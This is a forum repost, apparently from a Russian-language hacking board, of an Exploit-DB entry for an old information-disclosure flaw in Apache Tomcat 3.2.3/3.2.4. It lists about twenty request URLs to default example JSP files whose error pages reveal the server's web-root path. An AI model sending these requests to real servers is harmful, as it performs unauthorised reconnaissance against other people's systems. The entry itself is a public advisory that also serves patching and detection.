Exploit Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21491
Проверка EDB
  1. Пройдено
Автор
RICHARD BRAIN
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2002-2007
Дата публикации
2002-05-29
Код:
source: https://www.securityfocus.com/bid/4877/info

Apache Tomcat is a freely available, open source web server maintained by
the Apache Foundation.

When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root. 

The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp
 
Источник
www.exploit-db.com

Похожие темы